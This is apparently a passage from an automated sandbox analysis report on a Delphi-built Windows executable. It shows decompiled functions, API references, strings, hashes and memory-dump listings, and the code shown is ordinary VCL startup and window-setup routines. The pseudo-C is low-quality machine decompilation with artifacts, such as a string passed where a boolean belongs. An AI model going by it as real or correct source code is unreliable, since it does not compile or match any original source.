0x00458165
0x00458167
0x0045816f
0x00458172
0x00458173
0x00458179
0x00000000
0x00000000
0x004581eb
0x004581ee
0x004581f2
0x00458226
0x0045822c
0x0045822f
0x00458236
0x00458238
0x0045823b
0x0045823e
0x00458243
0x00458246
0x00458246
0x0045824f
0x004581f4
0x004581f7
0x004581fc
0x004581ff
0x00458205
0x00458207
0x0045820e
0x00458211
0x00458211
0x00458213
0x00458213
0x0045821a
0x0045821f
0x00000000
0x00000000
0x00458113
0x00458116
0x00458119
0x0045811a
0x0045811f
0x00458121
0x00458130
0x00458123
0x00458124
0x00458129
0x00000000
0x00000000
0x004580fb
0x004580fe
0x00458101
0x00458103
0x00458109
0x00458109
0x00000000
0x00000000
0x0045813b
0x0045813e
0x00458145
0x00000000
0x00000000
0x00457f32
0x00457f32
0x00457f33
0x00000000
0x00457f35
0x00457f51
0x00000000
0x00457f53
0x00457f53
0x00457f55
0x00457f58
0x00457f58
0x004585a1
0x004585a7
0x00457f60
0x00457f60
0x00457f61
0x00457f61
0x00457f62
0x00000000
0x00000000
0x00000000
0x00457f62

Strings

RegisterAutomation, xrefs: 004582F5
vcltest3.dll, xrefs: 004582D4

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: RegisterAutomation$vcltest3.dll
API String ID: 0-2963190186
Opcode ID: 5cd4afffb3323ad7217636889ebc45e13a21d729b49be7357212e6fd45c716a9
Instruction ID: b1d9b3bcd28d704f93b440f0cbd87eb195104d8ee60cfb3cab24f4fd71e64ee2
Opcode Fuzzy Hash: 5cd4afffb3323ad7217636889ebc45e13a21d729b49be7357212e6fd45c716a9
Instruction Fuzzy Hash: 0DE17F30A04208EFD700DB59C585A5EBBB1BB04315F6885ABEC45AB353DF38EE49DB49

Uniqueness

Uniqueness Score: -1.00%

Function 00405D84, Relevance: 15.1, APIs: 10, Instructions: 98
stringlibrarythreadCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00405D84() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00401310();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401318();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00401310();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00401310();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00401310();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}

0x00405d84
0x00405d8c
0x00405d93
0x00405d94
0x00405da7
0x00405dac
0x00405db5
0x00405e9e
0x00405ea5
0x00405dcb
0x00405dcb
0x00405dd1
0x00405dd2
0x00405ddf
0x00405de4
0x00405de7
0x00405de3
0x00000000
0x00405de3
0x00405df3
0x00405dfb
0x00405e01
0x00405e06
0x00405e13
0x00405e17
0x00405e18
0x00405e19
0x00405e2e
0x00405e2e
0x00405e32
0x00405e4b
0x00405e4f
0x00405e50
0x00405e51
0x00405e61
0x00405e66
0x00405e6a
0x00405e6c
0x00405e81
0x00405e85
0x00405e86
0x00405e87
0x00405e97
0x00405e9c
0x00405e9c
0x00405e6a
0x00405e32
0x00000000
0x00405dfb

APIs

lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405D94
GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DA1
GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DA7
lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DD2
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E19
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E29
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E51
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E61
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405E87
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405E97

Strings

Software\Borland\Locales, xrefs: 00405CA8, 00405CC6
Software\Borland\Delphi\Locales, xrefs: 00405CE4

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: cb28f160dafa1149e6bab2272285a120a5385a2738fad10cdcded8b14b4c15f3
Instruction ID: 1996122f5b3b820df51850e3b8abf2c553d6293b2967b506f70bd3d03d36238e
Opcode Fuzzy Hash: cb28f160dafa1149e6bab2272285a120a5385a2738fad10cdcded8b14b4c15f3
Instruction Fuzzy Hash: 82315071E0061C2AFB25D6B8DC8ABEF66AC8B04384F4441F7B644F61C1DA789F848F94

Uniqueness

Uniqueness Score: -1.00%

Function 00444250, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00444250(void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t6;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t28;

				_t25 = __esi;
				_t17 = __ecx;
				_push(_t28);
				_push(0x4442d6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				 *0x48fb6c =  *0x48fb6c - 1;
				if( *0x48fb6c < 0) {
					 *0x48fb68 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
					_t31 =  *0x48fb68;
					E0044401C(_t16, __edi,  *0x48fb68);
					_t6 =  *0x434730; // 0x43477c
					E00413700(_t6, _t16, _t17,  *0x48fb68);
					_t8 =  *0x434730; // 0x43477c
					E004137A0(_t8, _t16, _t17, _t31);
					_t21 =  *0x434730; // 0x43477c
					_t10 =  *0x4458dc; // 0x445928
					E0041374C(_t10, _t16, _t21, __esi, _t31);
					_t22 =  *0x434730; // 0x43477c
					_t12 =  *0x4442e0; // 0x44432c
					E0041374C(_t12, _t16, _t22, __esi, _t31);
					_t23 =  *0x434730; // 0x43477c
					_t14 =  *0x444494; // 0x4444e0
					E0041374C(_t14, _t16, _t23, _t25, _t31);
				}
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x4442dd);
				return 0;
			}

0x00444250
0x00444250
0x00444255
0x00444256
0x0044425b
0x0044425e
0x00444261
0x00444268
0x00444278
0x00444278
0x0044427f
0x00444284
0x00444289
0x0044428e
0x00444293
0x00444298
0x0044429e
0x004442a3
0x004442a8
0x004442ae
0x004442b3
0x004442b8
0x004442be
0x004442c3
0x004442c3
0x004442ca
0x004442cd
0x004442d0
0x004442d5

APIs

GetVersion.KERNEL32(00000000,004442D6), ref: 0044426A

Part of subcall function 0044401C: GetCurrentProcessId.KERNEL32(?,00000000,00444194), ref: 0044403D
Part of subcall function 0044401C: GlobalAddAtomA.KERNEL32 ref: 00444070
Part of subcall function 0044401C: GetCurrentThreadId.KERNEL32 ref: 0044408B
Part of subcall function 0044401C: GlobalAddAtomA.KERNEL32 ref: 004440C1
Part of subcall function 0044401C: RegisterClipboardFormatA.USER32(00000000), ref: 004440D7
Part of subcall function 0044401C: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00444194), ref: 0044415B
Part of subcall function 0044401C: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 0044416C

Strings

,CD, xrefs: 004442AE
(YD, xrefs: 0044429E
DD, xrefs: 004442BE
|GC, xrefs: 00444284, 0044428E, 00444298, 004442A8, 004442B8

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
String ID: (YD$,CD$|GC$DD
API String ID: 3775504709-3582542479
Opcode ID: 26293d3d33b5a23c2d3de9eb7b343b5a76a1fb54df860bdee2b58c18c2512987
Instruction ID: f65b616b6b64fb2421420fd6d6af48ed32fddbf6d5f26329c14427d1c2375db4
Opcode Fuzzy Hash: 26293d3d33b5a23c2d3de9eb7b343b5a76a1fb54df860bdee2b58c18c2512987
Instruction Fuzzy Hash: 4CF04FB82246809FE611EF26FC52A593394F7C67053A1847AF440836B6C738BD518B8C

Uniqueness

Uniqueness Score: -1.00%

Function 00457E74, Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00457E74(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
				_push(_t26); // executed
				L00406D08(); // executed
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}

0x00457e80
0x00457e8a
0x00457e93
0x00457e9a
0x00457e9d
0x00457e9e
0x00457ea9
0x00457ead

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00457E9E

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 763f9b8dc42cb0fabb36a49688d880cb4635935600fc2a0dd726c6e93b0b0ea9
Instruction ID: beed15686c4b45b1ace3871d790c62323329b873bdaa2c708029d08bdaf2a4e1
Opcode Fuzzy Hash: 763f9b8dc42cb0fabb36a49688d880cb4635935600fc2a0dd726c6e93b0b0ea9
Instruction Fuzzy Hash: 8EF0C579215608AFDB40DF9DD588D4AFBE8BF4C260B458195F988CB321C234FD808F90

Uniqueness

Uniqueness Score: -1.00%

Function 0044401C, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0044401C(void* __ebx, void* __edi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				char _t29;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t53;
				struct HINSTANCE__* _t63;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr _t83;
				void* _t87;

				_v20 = 0;
				_v8 = 0;
				_push(_t87);
				_push(0x444194);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe0;
				_v16 = GetCurrentProcessId();
				_v12 = 0;
				E004092D8("Delphi%.8X", 0,  &_v16,  &_v8);
				E00404374(0x48fb74, _v8);
				_t25 =  *0x48fb74; // 0x2130e78
				 *0x48fb70 = GlobalAddAtomA(E004047D0(_t25));
				_t29 =  *0x48f714; // 0x400000
				_v36 = _t29;
				_v32 = 0;
				_v28 = GetCurrentThreadId();
				_v24 = 0;
				E004092D8("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
				E00404374(0x48fb78, _v20);
				_t35 =  *0x48fb78; // 0x2130e94
				 *0x48fb72 = GlobalAddAtomA(E004047D0(_t35));
				_t38 =  *0x48fb78; // 0x2130e94
				 *0x48fb7c = RegisterClipboardFormatA(E004047D0(_t38));
				 *0x48fbb4 = E00414340(1);
				E00443C20();
				 *0x48fb64 = E00443A48(1, 1);
				_t47 = E004565F4(1, __edi);
				_t78 =  *0x48e838; // 0x48fc00
				 *_t78 = _t47;
				_t49 = E004576D8(0, 1);
				_t80 =  *0x48e6ec; // 0x48fbfc
				 *_t80 = _t49;
				_t50 =  *0x48e6ec; // 0x48fbfc
				E004591E4( *_t50, 1);
				_t53 =  *0x4338d4; // 0x4338d8
				E0041388C(_t53, 0x435dd0, 0x435de0);
				_t63 = GetModuleHandleA("USER32");
				if(_t63 != 0) {
					 *0x4718cc = GetProcAddress(_t63, "AnimateWindow");
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(0x44419b);
				E00404320( &_v20);
				return E00404320( &_v8);
			}

0x00444025
0x00444028
0x0044402d
0x0044402e
0x00444033
0x00444036
0x00444042
0x00444045
0x00444053
0x00444060
0x00444065
0x00444075
0x0044407f
0x00444084
0x00444087
0x00444090
0x00444093
0x004440a4
0x004440b1
0x004440b6
0x004440c6
0x004440cc
0x004440dc
0x004440ed
0x004440f2
0x00444103
0x00444111
0x00444116
0x0044411c
0x00444127
0x0044412c
0x00444132
0x00444134
0x0044413d
0x0044414c
0x00444151
0x00444160
0x00444164
0x00444171
0x00444171
0x00444178
0x0044417b
0x0044417e
0x00444186
0x00444193

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00444194), ref: 0044403D
GlobalAddAtomA.KERNEL32 ref: 00444070
GetCurrentThreadId.KERNEL32 ref: 0044408B
GlobalAddAtomA.KERNEL32 ref: 004440C1
RegisterClipboardFormatA.USER32(00000000), ref: 004440D7

Part of subcall function 00414340: RtlInitializeCriticalSection.KERNEL32(00411A30,?,?,004440ED,00000000,00000000,?,00000000,?,00000000,00444194), ref: 0041435F

Part of subcall function 00443C20: SetErrorMode.KERNEL32(00008000), ref: 00443C39
Part of subcall function 00443C20: GetModuleHandleA.KERNEL32(USER32,00000000,00443D86,?,00008000), ref: 00443C5D
Part of subcall function 00443C20: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00443C6A
Part of subcall function 00443C20: LoadLibraryA.KERNEL32(IMM32.DLL,00000000,00443D86,?,00008000), ref: 00443C86
Part of subcall function 00443C20: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00443CA8
Part of subcall function 00443C20: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00443CBD
Part of subcall function 00443C20: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00443CD2
Part of subcall function 00443C20: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00443CE7
Part of subcall function 00443C20: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00443CFC
Part of subcall function 00443C20: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00443D11
Part of subcall function 00443C20: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 00443D26
Part of subcall function 00443C20: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 00443D3B
Part of subcall function 00443C20: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00443D50
Part of subcall function 00443C20: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00443D65
Part of subcall function 00443C20: SetErrorMode.KERNEL32(?,00443D8D,00008000), ref: 00443D80

Part of subcall function 004565F4: GetKeyboardLayout.USER32 ref: 00456639
Part of subcall function 004565F4: 7378AC50.USER32(00000000,00000000,?,?,00000000,?,00444116,00000000,00000000,?,00000000,?,00000000,00444194), ref: 0045668E
Part of subcall function 004565F4: 7378AD70.GDI32(00000000,0000005A,00000000,00000000,?,?,00000000,?,00444116,00000000,00000000,?,00000000,?,00000000,00444194), ref: 00456698
Part of subcall function 004565F4: 7378B380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,?,?,00000000,?,00444116,00000000,00000000,?,00000000,?), ref: 004566A3

Part of subcall function 004576D8: LoadIconA.USER32(00400000,MAINICON), ref: 004577BD
Part of subcall function 004576D8: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,0044412C,00000000,00000000,?,00000000,?,00000000,00444194), ref: 004577EF
Part of subcall function 004576D8: OemToCharA.USER32 ref: 00457802
Part of subcall function 004576D8: CharLowerA.USER32(?,?,?,00400000,?,00000100,?,?,?,0044412C,00000000,00000000,?,00000000,?,00000000), ref: 00457842

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00444194), ref: 0044415B
GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 0044416C

Strings

ControlOfs%.8X%.8X, xrefs: 0044409F
AnimateWindow, xrefs: 00444166
USER32, xrefs: 00444156
Delphi%.8X, xrefs: 0044404E

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$7378Module$AtomCharCurrentErrorGlobalHandleLoadMode$B380ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterSectionThread
String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
API String ID: 3470948961-1126952177
Opcode ID: e33024c06f5afdee77b25c73845cc6a19d7e5998cc67c6f4b629d1891f190287
Instruction ID: af478dcbbb5da71574c89e97fa3cf061665a4bb14f526afbd268ac0a14bc0d7f
Opcode Fuzzy Hash: e33024c06f5afdee77b25c73845cc6a19d7e5998cc67c6f4b629d1891f190287
Instruction Fuzzy Hash: 144141B0A006459BD700FFB9E892A8E77F4AB55308B51953FF500E77A2DB38A9048B5D

Uniqueness

Uniqueness Score: -1.00%

Function 004579E0, Relevance: 13.6, APIs: 9, Instructions: 130
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E004579E0(void* __eax, void* __ebx, void* __ecx) {
				struct _WNDCLASSA _v44;
				char _v48;
				char* _t22;
				long _t23;
				CHAR* _t25;
				struct HINSTANCE__* _t26;
				intOrPtr* _t28;
				signed int _t31;
				intOrPtr* _t32;
				signed int _t35;
				struct HINSTANCE__* _t36;
				void* _t38;
				CHAR* _t39;
				struct HWND__* _t40;
				char* _t46;
				char* _t51;
				long _t54;
				long _t58;
				struct HINSTANCE__* _t61;
				intOrPtr _t63;
				void* _t68;
				struct HMENU__* _t69;
				intOrPtr _t76;
				void* _t82;
				short _t87;

				_v48 = 0;
				_t68 = __eax;
				_push(_t82);
				_push(0x457b77);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82 + 0xffffffd4;
				if( *((char*)(__eax + 0xa4)) != 0) {
					L13:
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(0x457b7e);
					return E00404320( &_v48);
				}
				_t22 =  *0x48e74c; // 0x48f048
				if( *_t22 != 0) {
					goto L13;
				}
				_t23 = E0041CDB0(E00457EFC, __eax); // executed
				 *(_t68 + 0x40) = _t23;
				_t25 =  *0x471c2c; // 0x4576c8
				_t26 =  *0x48f714; // 0x400000
				if(GetClassInfoA(_t26, _t25,  &_v44) == 0) {
					_t61 =  *0x48f714; // 0x400000
					 *0x471c18 = _t61;
					_t87 = RegisterClassA(0x471c08);
					if(_t87 == 0) {
						_t63 =  *0x48e500; // 0x41d0c4
						E00406520(_t63,  &_v48);
						E0040A0E8(_v48, 1);
						E00403D80();
					}
				}
				_t28 =  *0x48e5b4; // 0x48fa94
				_t31 =  *((intOrPtr*)( *_t28))(0) >> 1;
				if(_t87 < 0) {
					asm("adc eax, 0x0");
				}
				_t32 =  *0x48e5b4; // 0x48fa94
				_t35 =  *((intOrPtr*)( *_t32))(1, _t31) >> 1;
				if(_t87 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t35);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t36 =  *0x48f714; // 0x400000
				_push(_t36);
				_push(0);
				_t7 = _t68 + 0x8c; // 0x28ac0044
				_t38 = E004047D0( *_t7);
				_t39 =  *0x471c2c; // 0x4576c8, executed
				_t40 = E0040728C(_t39, 0x84ca0000, _t38); // executed
				 *(_t68 + 0x30) = _t40;
				_t9 = _t68 + 0x8c; // 0x44fbf8
				E00404320(_t9);
				 *((char*)(_t68 + 0xa4)) = 1;
				_t11 = _t68 + 0x40; // 0x10940000
				_t12 = _t68 + 0x30; // 0xe
				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
				_t46 =  *0x48e620; // 0x48fb68
				if( *_t46 != 0) {
					_t54 = E004585D4(_t68);
					_t13 = _t68 + 0x30; // 0xe
					SendMessageA( *_t13, 0x80, 1, _t54); // executed
					_t58 = E004585D4(_t68);
					_t14 = _t68 + 0x30; // 0xe
					SetClassLongA( *_t14, 0xfffffff2, _t58); // executed
				}
				_t15 = _t68 + 0x30; // 0xe
				_t69 = GetSystemMenu( *_t15, "true");
				DeleteMenu(_t69, 0xf030, 0);
				DeleteMenu(_t69, 0xf000, 0);
				_t51 =  *0x48e620; // 0x48fb68
				if( *_t51 != 0) {
					DeleteMenu(_t69, 0xf010, 0);
				}
				goto L13;
			}

0x004579e9
0x004579ec
0x004579f0
0x004579f1
0x004579f6
0x004579f9
0x00457a03
0x00457b61
0x00457b63
0x00457b66
0x00457b69
0x00457b76
0x00457b76
0x00457a09
0x00457a11
0x00000000
0x00000000
0x00457a1d
0x00457a22
0x00457a29
0x00457a2f
0x00457a3c
0x00457a3e
0x00457a43
0x00457a52
0x00457a55
0x00457a5a
0x00457a5f
0x00457a6e
0x00457a73
0x00457a73
0x00457a55
0x00457a7a
0x00457a83
0x00457a85
0x00457a87
0x00457a87
0x00457a8d
0x00457a96
0x00457a98
0x00457a9a
0x00457a9a
0x00457a9d
0x00457a9e
0x00457aa0
0x00457aa2
0x00457aa4
0x00457aa6
0x00457aab
0x00457aac
0x00457aae
0x00457ab4
0x00457ac0
0x00457ac5
0x00457aca
0x00457acd
0x00457ad3
0x00457ad8
0x00457adf
0x00457ae5
0x00457ae9
0x00457aee
0x00457af6
0x00457afa
0x00457b07
0x00457b0b
0x00457b12
0x00457b1a
0x00457b1e
0x00457b1e
0x00457b25
0x00457b2e
0x00457b38
0x00457b45
0x00457b4a
0x00457b52
0x00457b5c
0x00457b5c
0x00000000

APIs

Part of subcall function 0041CDB0: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041CDCE

GetClassInfoA.USER32 ref: 00457A35
RegisterClassA.USER32 ref: 00457A4D

Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551

SetWindowLongA.USER32 ref: 00457AE9
SendMessageA.USER32 ref: 00457B0B
SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10940000,0044FB6C), ref: 00457B1E
GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,0044FB6C), ref: 00457B29
DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044FB6C), ref: 00457B38
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044FB6C), ref: 00457B45
DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044FB6C), ref: 00457B5C

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
String ID:
API String ID: 2103932818-0
Opcode ID: 61c1e4053d05c4287ab9c8302e568e471a7a44a351a4d4e23503fd9e28d74e65
Instruction ID: ad02c31446ef89ead986fbf7a95cf857443d092e367496dd216a9756b297a0fc
Opcode Fuzzy Hash: 61c1e4053d05c4287ab9c8302e568e471a7a44a351a4d4e23503fd9e28d74e65
Instruction Fuzzy Hash: 104122716442006FE711EF69EC82F5A37A8AB45708F54457AFE00EF2E3DA78AC44876C

Uniqueness

Uniqueness Score: -1.00%

Function 00456DD0, Relevance: 10.6, APIs: 7, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00456DD0(void* __eax, void* __ebx, void* __ecx, void* __edi) {
				char _v5;
				struct tagLOGFONTA _v65;
				struct tagLOGFONTA _v185;
				struct tagLOGFONTA _v245;
				void _v405;
				void* _t23;
				int _t27;
				void* _t30;
				intOrPtr _t38;
				struct HFONT__* _t41;
				struct HFONT__* _t45;
				struct HFONT__* _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t57;
				void* _t72;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffe6c;
				_t57 = __eax;
				_v5 = 0;
				if( *0x48fbfc != 0) {
					_t54 =  *0x48fbfc; // 0x2131310
